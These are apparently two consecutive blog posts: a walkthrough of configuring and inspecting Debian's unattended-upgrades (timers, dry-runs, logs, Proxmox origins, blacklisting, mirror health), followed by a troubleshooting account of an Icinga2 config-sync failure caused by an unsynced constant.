Created symlink /etc/systemd/system/multi-user.target.wants/unattended-upgrades.service → /lib/systemd/system/unattended-upgrades.service.
Synchronizing state of unattended-upgrades.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable unattended-upgrades
Setting up gir1.2-glib-2.0:amd64 (1.74.0-3) ...
Setting up python3-gi (3.42.2-3+b1) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for libc-bin (2.36-9+deb12u3) ...
root@host:~# 

After the installation we have a new Systemd service called unattended-upgrades.service. However, if you think that stopping this service will disable unattended-upgrades you are mistaken. This unit-file solely exists to check if an unattended-upgrades run is in progress and to ensure it isn't killed mid-process, for example during a shutdown.

To disable unattended-upgrades we need to change the values in /etc/apt/apt.conf.d/20auto-upgrades to zero. But as written above: This file currently isn't present in our system yet.

root@host:~# ls -lach /etc/apt/apt.conf.d/20auto-upgrades
ls: cannot access '/etc/apt/apt.conf.d/20auto-upgrades': No such file or directory
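
For reference: once the file exists, disabling unattended-upgrades simply means setting both values to zero:

root@host:~# cat /etc/apt/apt.conf.d/20auto-upgrades
APT::Periodic::Update-Package-Lists "0";
APT::Periodic::Unattended-Upgrade "0";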

However, as we want to have a look at the internals first, we do not fix this yet. Instead, let us have a look at the relevant Systemd unit and timer-files.

The Systemd unit and timer files unattended-upgrades relies upon

A systemctl list-timers --all will show you all in-/active timer files on our system along with the unit-file which is triggered by each timer. On every Debian system utilizing Systemd you will most likely have the following unit and timer files per default, even when unattended-upgrades is not installed.

root@host:~# systemctl list-timers --all
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Sat 2024-10-26 00:00:00 CEST 15min left    Fri 2024-10-25 00:00:00 CEST 23h ago      dpkg-db-backup.timer         dpkg-db-backup.service
Sat 2024-10-26 00:00:00 CEST 15min left    Fri 2024-10-25 00:00:00 CEST 23h ago      logrotate.timer              logrotate.service
Sat 2024-10-26 06:39:59 CEST 6h left       Fri 2024-10-25 06:56:26 CEST 16h ago      apt-daily-upgrade.timer      apt-daily-upgrade.service
Sat 2024-10-26 10:27:42 CEST 10h left      Fri 2024-10-25 08:18:00 CEST 15h ago      man-db.timer                 man-db.service
Sat 2024-10-26 11:13:30 CEST 11h left      Fri 2024-10-25 21:06:00 CEST 2h 38min ago apt-daily.timer              apt-daily.service
Sat 2024-10-26 22:43:26 CEST 22h left      Fri 2024-10-25 22:43:26 CEST 1h 0min ago  systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2024-10-27 03:10:37 CET  1 day 4h left Sun 2024-10-20 03:11:00 CEST 5 days ago   e2scrub_all.timer            e2scrub_all.service
Mon 2024-10-28 01:12:51 CET  2 days left   Mon 2024-10-21 01:40:06 CEST 4 days ago   fstrim.timer                 fstrim.service

9 timers listed.

Relevant is the apt-daily.timer, which activates apt-daily.service. This unit-file executes /usr/lib/apt/apt.systemd.daily update. The script takes care of reading the necessary APT parameters and performing an apt-get update to update the package lists.

The timer apt-daily-upgrade.timer triggers the service apt-daily-upgrade.service. Its unit-file performs a /usr/lib/apt/apt.systemd.daily install and this is where the actual "apt-get upgrade magic" happens. If the appropriate APT values are set, outstanding updates will be downloaded and installed.

Notice the absence of a specific unattended-upgrades unit-file or timer as unattended-upgrades is really just a script to automate the APT package system.

This effectively means: you are able to configure when package-list updates are done and when updates are installed by modifying the OnCalendar= parameter via drop-in files for the apt-daily(-upgrade).timer units.
The systemd.timer documentation and man 7 systemd.time (systemd.time documentation) have all the glorious details.
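
As a small sketch (the time values are just an example, not a recommendation), a drop-in created via systemctl edit apt-daily-upgrade.timer could look like this:

root@host:~# systemctl edit apt-daily-upgrade.timer
# Content of the created /etc/systemd/system/apt-daily-upgrade.timer.d/override.conf
[Timer]
# An empty OnCalendar= resets the value from the packaged timer, then we set our own
OnCalendar=
OnCalendar=*-*-* 05:30
RandomizedDelaySec=30m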

I won't go into further detail regarding the /usr/lib/apt/apt.systemd.daily script. If you want to know more I recommend executing the script with bash's -x parameter (also called debug mode). This way commands and values are printed out as the script runs.

root@host:~# bash -x /usr/lib/apt/apt.systemd.daily update
# Read the output, view the script, trace the parameters and then execute:
root@host:~# bash -x /usr/lib/apt/apt.systemd.daily lock_is_held update

Or if you are more interested in the actual "How are the updates installed?"-part, perform the following:

root@host:~# bash -x /usr/lib/apt/apt.systemd.daily install
# Read the output, view the script, trace the parameters and then execute:
root@host:~# bash -x /usr/lib/apt/apt.systemd.daily lock_is_held install

It's a good lesson in understanding APT-internals/what Debian is running "under the hood".

But again: I advise you to make sure that no actual updates are installed when you do so. In order to learn how to make sure read along. 😇

How does everything work together? What makes unattended-upgrades unattended?

Let us recapitulate. We installed the unattended-upgrades package, checked the relevant Systemd unit & timer files and had a brief look at the /usr/lib/apt/apt.systemd.daily script which is responsible for triggering the appropriate APT and unattended-upgrades commands.

APT itself is configured via the files in /etc/apt/apt.conf.d/. How can APT (or any human) know the setting of a specific parameter? Sure, you can grep through all the files - but that would also most likely include files with syntax errors etc.

Luckily there is apt-config, which allows us to query APT and read specific values. It also takes care of validating everything. If you've configured an APT parameter in a file but apt-config doesn't reflect it - it's simply not applied and you must start searching for the error.

Armed with this knowledge we can execute the following two commands to check if our package-lists will be updated automatically via the apt-daily.service and if unattended-upgrades will install packages. If there is no associated value, apt-config won't print out anything.

The two settings which are set inside /etc/apt/apt.conf.d/20auto-upgrades are APT::Periodic::Update-Package-Lists and APT::Periodic::Unattended-Upgrade. The first activates the automatic package-list updates while the latter enables the automatic installation of updates. If we check them on our system with the manually installed unattended-upgrades package we get the following:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade

This means no package-list updates, no installation of updates. And currently this is what we want, so we can keep experimenting a little bit before we are ready to hit production.

A working unattended-upgrades will give the following values:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
APT::Periodic::Update-Package-Lists "1";
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade
APT::Periodic::Unattended-Upgrade "1";

First dry-run

Time to start our first unattended-upgrades dry-run. This way we can watch what would be done without actually modifying anything. I recommend utilizing the -v parameter in addition to --dry-run as otherwise the first 8 lines of the unattended-upgrades output itself will be omitted - despite them being the most valuable ones for most novice users.

root@host:~# unattended-upgrades --dry-run -v
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is running on battery.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,label=Debian-Security
Initial blacklist:
Initial whitelist (not strict):
Option --dry-run given, *not* performing real actions
Packages that will be upgraded: base-files bind9-dnsutils bind9-host bind9-libs dnsutils git git-man initramfs-tools initramfs-tools-core intel-microcode libc-bin libc-l10n libc6 libc6-i386 libcurl3-gnutls libexpat1 libnss-systemd libpam-systemd libpython3.11-minimal libpython3.11-stdlib libssl3 libsystemd-shared libsystemd0 libudev1 linux-image-amd64 locales openssl python3.11 python3.11-minimal qemu-guest-agent systemd systemd-sysv systemd-timesyncd udev
Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure --recursive /tmp/apt-dpkg-install-o5g9u2
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libsystemd0:amd64 libsystemd-shared:amd64 systemd:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/systemd-sysv_252.30-1~deb12u2_amd64.deb /var/cache/apt/archives/udev_252.30-1~deb12u2_amd64.deb /var/cache/apt/archives/libudev1_252.30-1~deb12u2_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libudev1:amd64
/usr/bin/dpkg --status-fd 10 --configure --pending
Preconfiguring packages ...
Preconfiguring packages ...
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc6-i386_2.36-9+deb12u8_amd64.deb /var/cache/apt/archives/libc6_2.36-9+deb12u8_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libc6:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc-bin_2.36-9+deb12u8_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure libc-bin:amd64
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libc-l10n_2.36-9+deb12u8_all.deb /var/cache/apt/archives/locales_2.36-9+deb12u8_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/intel-microcode_3.20240813.1~deb12u1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/python3.11_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/libpython3.11-stdlib_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/python3.11-minimal_3.11.2-6+deb12u3_amd64.deb /var/cache/apt/archives/libpython3.11-minimal_3.11.2-6+deb12u3_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/git_1%3a2.39.5-0+deb12u1_amd64.deb /var/cache/apt/archives/git-man_1%3a2.39.5-0+deb12u1_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/base-files_12.4+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --no-triggers --configure base-files:amd64
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/initramfs-tools_0.142+deb12u1_all.deb /var/cache/apt/archives/initramfs-tools-core_0.142+deb12u1_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/bind9-dnsutils_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/bind9-host_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/bind9-libs_1%3a9.18.28-1~deb12u2_amd64.deb /var/cache/apt/archives/dnsutils_1%3a9.18.28-1~deb12u2_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libexpat1_2.5.0-1+deb12u1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/qemu-guest-agent_1%3a7.2+dfsg-7+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libssl3_3.0.14-1~deb12u2_amd64.deb /var/cache/apt/archives/openssl_3.0.14-1~deb12u2_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libcurl3-gnutls_7.88.1-10+deb12u7_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/linux-image-6.1.0-26-amd64_6.1.112-1_amd64.deb /var/cache/apt/archives/linux-image-amd64_6.1.112-1_amd64.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
All upgrades installed
The list of kept packages can't be calculated in dry-run mode.
root@host:~#

We get told which configured origins will be used (see part 1), all packages on the black- and whitelist and which packages will actually be upgraded. Just as if we were executing apt-get upgrade manually.

Also there is the neat line Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log informing us of a logfile being written. How nice!

The dpkg-commands are what normally happens in the background to install and configure the packages. In 99% of all cases this is irrelevant. Nevertheless they become invaluable when an update goes sideways or dpkg/apt can't properly configure a package.

Where do we find this information afterwards?

Logfiles

There are two logfiles being written:

  1. /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
  2. /var/log/unattended-upgrades/unattended-upgrades.log

And how do they differ?

/var/log/unattended-upgrades/unattended-upgrades-dpkg.log has all output from dpkg/apt itself. You remember all these Preparing to unpack... packagename, Unpacking packagename, Setting up packagename lines? The lines you encounter when you execute apt-get manually? Which weren't present in the output from our dry-run? They get logged into that file. So if you are wondering when a certain package was installed or what went wrong, this is the logfile to look into.

/var/log/unattended-upgrades/unattended-upgrades.log contains the output from unattended-upgrades itself. This makes it possible to check what allowed origins/blacklists/whitelists, etc. were used in a run. Conveniently the output also includes the packages which are suitable for upgrading.

Options! Give me options!

Now that we know how we can execute a dry-run and retrace what happened it's time to have a look at the various options unattended-upgrades offers.

I recommend reading the config file /etc/apt/apt.conf.d/50unattended-upgrades once completely as the various options to fine-tune the behaviour are listed at the end. If you want unattended-upgrades to send mails, or only install updates on shutdown/reboot this is your way to go.

Or do you want an automatic reboot after unattended-upgrades has done its job (see: Unattended-Upgrade::Automatic-Reboot), ensuring the new kernel and system libraries are used right away? That is configured there as well.

Adding the Proxmox Repository to unattended-upgrades

Enabling updates for packages in different repositories means we have to add a new Repository to unattended-upgrades first. Using our knowledge from Part 1 and looking at the Release file for the Proxmox pve-no-subscription Debian Bookworm repository we can build the following origins-pattern:

"origin=Proxmox,codename=${distro_codename},label=Proxmox Debian Repository,a=stable";

A new dry-run will show us that the packages proxmox-default-kernel and proxmox-kernel-6.5 will be upgraded.

root@host:~# unattended-upgrades -v --dry-run
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is running on battery.
Checking if connection is metered is skipped. Please install python3-gi package to detect metered connections and skip downloading updates.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,label=Debian-Security, origin=Proxmox,codename=bookworm,label=Proxmox Debian Repository,a=stable
Initial blacklist:
Initial whitelist (not strict):
Option --dry-run given, *not* performing real actions
Packages that will be upgraded: proxmox-default-kernel proxmox-kernel-6.5
Writing dpkg log to /var/log/unattended-upgrades/unattended-upgrades-dpkg.log
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/proxmox-kernel-6.8.8-2-pve-signed_6.8.8-2_amd64.deb /var/cache/apt/archives/proxmox-kernel-6.8_6.8.8-2_all.deb /var/cache/apt/archives/proxmox-default-kernel_1.1.0_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
/usr/bin/dpkg --status-fd 10 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/proxmox-kernel-6.5.13-5-pve-signed_6.5.13-5_amd64.deb /var/cache/apt/archives/proxmox-kernel-6.5_6.5.13-5_all.deb
/usr/bin/dpkg --status-fd 10 --configure --pending
All upgrades installed
The list of kept packages can't be calculated in dry-run mode.

In the next step we will use this to see how blacklisting works.

Note: Enabling unattended-upgrades for the Proxmox packages on the Proxmox host itself is a controversial topic. In clustered & production setups I wouldn't recommend it either. But given this is my single-node, homelab Proxmox I have no problem with it.

However I have no problem with enabling OS updates as this is no different from what Proxmox themselves do/recommend: https://pve.proxmox.com/pve-docs/pve-admin-guide.html#system_software_updates

Blacklisting packages

Excluding a certain package from the automatic updates can be done in two different ways. Either you don't include the repository into the Unattended-Upgrade::Origins-Pattern block - effectively excluding all packages in the repository. Or you exclude only single packages by listing them inside the Unattended-Upgrade::Package-Blacklist block. The configuration file has examples for the various patterns needed (exact match, name beginning with a certain string, escaping, etc.)

The following line will blacklist all packages starting with proxmox- in their name.

Unattended-Upgrade::Package-Blacklist {
    // The following matches all packages starting with linux-
    //  "linux-";

    // Blacklist all proxmox- packages
    "proxmox-";

    [...]
};

Executing a dry-run again will give the following result:

root@host:~# unattended-upgrades -v --dry-run
Checking if system is running on battery is skipped. Please install powermgmt-base package to check power status and skip installing updates when the system is running on battery.
Checking if connection is metered is skipped. Please install python3-gi package to detect metered connections and skip downloading updates.
Starting unattended upgrades script
Allowed origins are: origin=Debian,codename=bookworm,label=Debian, origin=Debian,codename=bookworm,label=Debian-Security, origin=Debian,codename=bookworm-security,label=Debian-Security, origin=Proxmox,codename=bookworm,label=Proxmox Debian Repository,a=stable
Initial blacklist: proxmox-
Initial whitelist (not strict):
No packages found that can be upgraded unattended and no pending auto-removals
The list of kept packages can't be calculated in dry-run mode.

"The following packages have been kept back" - What does this mean? Will unattended-upgrades help me?

Given is the following output from a manual apt-get upgrade run.

root@host:~# apt-get upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following packages have been kept back:
  proxmox-default-kernel proxmox-kernel-6.5
0 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.

The message means that the packages are part of so-called phased updates. Sadly the documentation regarding this in Debian is a bit sparse. The manpage apt_preferences(5) has a paragraph about it but that's pretty much it.

Ubuntu has a separate Wiki article about it, as their update manager honors the setting: https://wiki.ubuntu.com/PhasedUpdates

What it means is that some updates won't be rolled out to all servers immediately. Instead a random number is generated which determines if the update is applied or not.

Quote from apt_preferences(5):
"A system's eligibility to a phased update is determined by seeding random number generator with the package source name, the version number, and /etc/machine-id, and then calculating an integer in the range [0, 100]. If this integer is larger than the Phased-Update-Percentage, the version is pinned to 1, and thus held back. Otherwise, normal policy rules apply."

Unattended-upgrades however ignores this and installs the updates. Whether that is good or bad depends on your situation. Luckily there was some recent activity in the GitHub issue regarding this topic, so it may be resolved soon-ish: unattended-upgrades on GitHub, issue 259: Please honor Phased-Update-Percentage for package versions
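
If you want a manual apt-get upgrade to behave the same way and include phased updates, newer apt versions offer - to my knowledge - the APT::Get::Always-Include-Phased-Updates option (see apt_preferences(5)):

root@host:~# apt-get -o APT::Get::Always-Include-Phased-Updates=true upgrade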

Enabling unattended-upgrades

Now it's finally time to enable unattended-upgrades for our system. Execute dpkg-reconfigure -f noninteractive unattended-upgrades and check that the /etc/apt/apt.conf.d/20auto-upgrades file is present with the following content:

root@host:~# cat /etc/apt/apt.conf.d/20auto-upgrades
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";

After that verify that APT has indeed the correct values for those parameters:

root@host:~# apt-config dump APT::Periodic::Update-Package-Lists
APT::Periodic::Update-Package-Lists "1";
root@host:~# apt-config dump APT::Periodic::Unattended-Upgrade
APT::Periodic::Unattended-Upgrade "1";

You are then able to determine when the first run will happen by checking via systemctl list-timers apt-daily.timer apt-daily-upgrade.timer.

root@host:~# systemctl list-timers apt-daily.timer apt-daily-upgrade.timer
NEXT                        LEFT          LAST                        PASSED  UNIT                    ACTIVATES
Sat 2024-10-26 03:39:58 UTC 16min left    Fri 2024-10-25 09:12:58 UTC 18h ago apt-daily.timer         apt-daily.service
Sat 2024-10-26 06:21:30 UTC 2h 58min left Fri 2024-10-25 06:24:40 UTC 20h ago apt-daily-upgrade.timer apt-daily-upgrade.service

Set yourself a reminder in your calendar to check the logfiles and enjoy your automatic updates!

How to check the health of a Debian mirror

Remember how I, in part 1 of this series, mentioned that Debian mirrors are rarely out-of-sync, etc.? Yep, and now it happened while I was typing this post. The perfect opportunity to show you how to check your Debian mirror.

The error I got was the following:

root@host:~# apt-get update
Hit:1 http://security.debian.org/debian-security bookworm-security InRelease
Hit:2 http://debian.tu-bs.de/debian bookworm InRelease
Get:3 http://debian.tu-bs.de/debian bookworm-updates InRelease [55.4 kB]
Reading package lists... Done
E: Release file for http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease is expired (invalid since 16d 0h 59min 33s). Updates for this repository will not be applied.

The reason is that the InRelease file contains a Valid-Until timestamp. And currently it has the following value:
Valid-Until: Sat, 22 Jun 2024 20:12:12 UTC
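
You can check this yourself by fetching the InRelease file and looking for that field (curl is just what I'd reach for here, wget -qO- works as well):

root@host:~# curl -s http://debian.tu-bs.de/debian/dists/bookworm-updates/InRelease | grep Valid-Until
Valid-Until: Sat, 22 Jun 2024 20:12:12 UTC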

As this error originates on a remote host there is nothing I can do apart from switching to another Debian repository.

But how can you actually check that? https://mirror-master.debian.org/status/mirror-status.html lists the status of all Debian mirrors. If we search for debian.tu-bs.de we can see that the mirror indeed has problems and since when they exist.

Side note: Checking the mirror hierarchy can also be relevant sometimes: https://mirror-master.debian.org/status/mirror-hierarchy.html

Also.. 22 days without noticing that the Debian mirror I use is broken? Yeah.. Let's define a monitoring check for that. Something I didn't do for my setup at home.

As this would make this article unnecessarily long, I wrote a separate blog post about it. So feel free to read this next: How to monitor your APT-repositories with Icinga


Icinga2 error "check command does not exist" because of missing constant

Photo by Christina Morillo: https://www.pexels.com/photo/software-engineer-standing-beside-server-racks-1181354/

Apparently this problem kept me busy far too long, as I kept looking only into the Icinga2 master logfiles. Mainly because the service definition for my icinga CheckCommand was still from a time when there was only one master without any agents. This led to the check being executed on the master, and hence I never saw the problems on the agents..

Additionally the cluster and cluster-health checks only verify that all endpoints are connected. Which was the case all the time. Therefore I got no error there either.

But what happened?

I defined a new CheckCommand. It worked fine on the master. Then I rewrote the Service apply rule so that it matches all monitored Linux hosts. And then I got Check command not found for all these new service checks on all agent hosts.

I deleted the API config sync directories and restarted Icinga2 on the agents to trigger a new sync:

root@agent:/etc/icinga2# rm /var/lib/icinga2/api/zones-stage/* -rf && rm /var/lib/icinga2/api/zones/* -rf
root@agent:/etc/icinga2# systemctl restart icinga2.service

And suddenly all CheckCommands which are not part of the Icinga Template Library stopped working on the agents.

Uhm, ok. At this point I suspected I had somehow messed up my /etc/icinga2/zones.conf file some time ago. Turns out, this wasn't the case.

The root cause

Some weeks ago I defined a service check which is only executed on my Icinga2 master. However, I stored the CheckCommand and Service configuration under /etc/icinga2/zones.d/master anyway, as you never know when this comes in handy. (This has since been corrected in the article.) But the Telegram API requires a Token. And I defined that in /etc/icinga2/constants.conf - but this file isn't synced, as it is outside of /etc/icinga2/zones.d. That was on purpose, as I didn't want to sync the Token to all agents.
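
For illustration, the constant in /etc/icinga2/constants.conf looks roughly like this (token value obviously made up):

root@master:/etc/icinga2# grep TelegramBotToken /etc/icinga2/constants.conf
const TelegramBotToken = "1234567890:ExampleTokenOnly"

And the synced CheckCommand references exactly this constant, as you can see in the error output further down.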

This caused the config file sync on the agents to fail validation, as the constant for the Token couldn't be resolved.
But again.. This was only logged in the logfiles on the agents..

root@agent:/etc/icinga2# cat /var/log/icinga2/icinga2.log
[...]
[2024-07-17 22:39:04 +0200] information/ApiListener: Received configuration for zone 'global-templates' from endpoint 'master.domain.tld'. Comparing the timestamp and checksums.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/eventcommands.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/groups.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/host-templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/notifications.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/service-templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/telegrambot-notifications.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/templates.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/timeperiods.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Stage: Updating received configuration file '/var/lib/icinga2/api/zones-stage/global-templates//_etc/users.conf' for zone 'global-templates'.
[2024-07-17 22:39:04 +0200] information/ApiListener: Applying configuration file update for path '/var/lib/icinga2/api/zones-stage/global-templates' (6688 Bytes).
[2024-07-17 22:39:04 +0200] information/ApiListener: Received configuration updates (2) from endpoint 'master.domain.tld' are different to production, triggering validation and reload.
[2024-07-17 22:39:04 +0200] critical/ApiListener: Config validation failed for staged cluster config sync in '/var/lib/icinga2/api/zones-stage/'. Aborting. Logs: '/var/lib/icinga2/api/zones-stage//startup.log'
[...]

The /var/lib/icinga2/api/zones-stage/startup.log has the details:

root@agent:/etc/icinga2# cat /var/lib/icinga2/api/zones-stage/startup.log
[2024-07-17 23:36:19 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-17 23:36:19 +0200] information/cli: Loading configuration file(s).
[2024-07-17 23:36:19 +0200] information/ConfigItem: Committing config item(s).
[2024-07-17 23:36:19 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 46:26-46:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(44):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(45):     SERVICEDISPLAYNAME = "$service.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(46):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(47):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(48):

[2024-07-17 23:36:19 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 20:26-20:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(18):     NOTIFICATIONCOMMENT = "$notification.comment$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(19):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(20):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(21):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(22):

[2024-07-17 23:36:19 +0200] critical/config: 2 errors
[2024-07-17 23:36:19 +0200] critical/cli: Config validation failed. Re-run with 'icinga2 daemon -C' after fixing the config.

However... The tricky part is that a config validation will succeed!

root@agent:/etc/icinga2# icinga2 daemon -C
[2024-07-18 00:00:16 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-18 00:00:16 +0200] information/cli: Loading configuration file(s).
[2024-07-18 00:00:16 +0200] information/ConfigItem: Committing config item(s).
[2024-07-18 00:00:16 +0200] information/ApiListener: My API identity: agent.domain.tld
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 CheckerComponent.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 5 Zones.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 IcingaApplication.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 2 Endpoints.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 FileLogger.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 235 CheckCommands.
[2024-07-18 00:00:16 +0200] information/ConfigItem: Instantiated 1 ApiListener.
[2024-07-18 00:00:16 +0200] information/ScriptGlobal: Dumping variables to file '/var/cache/icinga2/icinga2.vars'
[2024-07-18 00:00:16 +0200] information/cli: Finished validating the configuration file(s).

And this was the reason why I was too focused on the master..

What I learned later is that you can use the following command to validate the configuration from the stage directory.
The relevant documentation is the "Receive Config" section of the Icinga 2 Config Sync chapter.

root@agent:/var/log/icinga2# icinga2 daemon -C --define System.ZonesStageVarDir=/var/lib/icinga2/api/zones-stage/
[2024-07-21 16:28:51 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2024-07-21 16:28:51 +0200] information/cli: Loading configuration file(s).
[2024-07-21 16:28:51 +0200] information/ConfigItem: Committing config item(s).
[2024-07-21 16:28:51 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 20:26-20:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(18):     NOTIFICATIONCOMMENT = "$notification.comment$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(19):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(20):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
